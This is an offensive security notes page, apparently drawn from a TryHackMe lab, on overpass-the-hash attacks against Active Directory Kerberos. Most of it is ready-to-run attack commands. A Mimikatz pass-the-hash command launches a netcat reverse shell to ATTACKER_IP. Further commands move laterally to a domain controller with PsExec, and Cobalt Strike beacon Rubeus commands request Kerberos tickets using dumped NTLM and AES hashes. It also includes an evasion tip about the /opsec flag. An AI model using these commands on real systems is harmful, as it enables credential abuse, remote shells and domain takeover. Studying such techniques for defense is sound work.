Overpass-the-hash uses dumped hash to obtain a Kerberos TGT or TGS, granting the attacker remote access to other domain-joined machines or services. See also pass-the-key, of which overpass-the-hash is a RC4-specific case.

Requirements

  • The password hash must be already cached to be dumpable.
  • Local admin privileges needed to dump the hash.
  • The remote must accept RC4 algorithm.

The captured NTLM hash is used as the RC4 encryption key in pass-the-key to authenticate against Kerberos.

Example

Both methods are noticeable in logs, so pick your poison.

Mimikatz

  • Use Mimikatz sekurlsa::pth to launch PowerShell in the compromised domain user
sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5556"

Mimikatz creates a handle to LSASS, which may stand out as being suspicious.

  • Do anything that requires Kerberos authentication to generate a TGT (e.g., net use \\dc01 to connect to DC network share)
  • Launch a remote PowerShell using PsExec.exe on dc01 (tool from SysInternals): .\PsExec.exe \\dc01 cmd.exe. The use of hostname / domain name is mandatory since using IP address falls back to NTLM authentication.

Rubeus

  • Cobalt Strike beacon & Rubeus with RC4/NTLM hash: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /ntlm:59fc0f884922b4ce376051134c71e22c /nowrap
    • alternatively use AES256: beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jking /aes256:4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6 /nowrap
    • use the /opsec switch to make the ticket options flag 0x40810010 instead of 0x40800010
  • Follow the same steps in the previous section.

RC4 encryption is considered a legacy ticket encryption type, and it is much more likely to be noticed.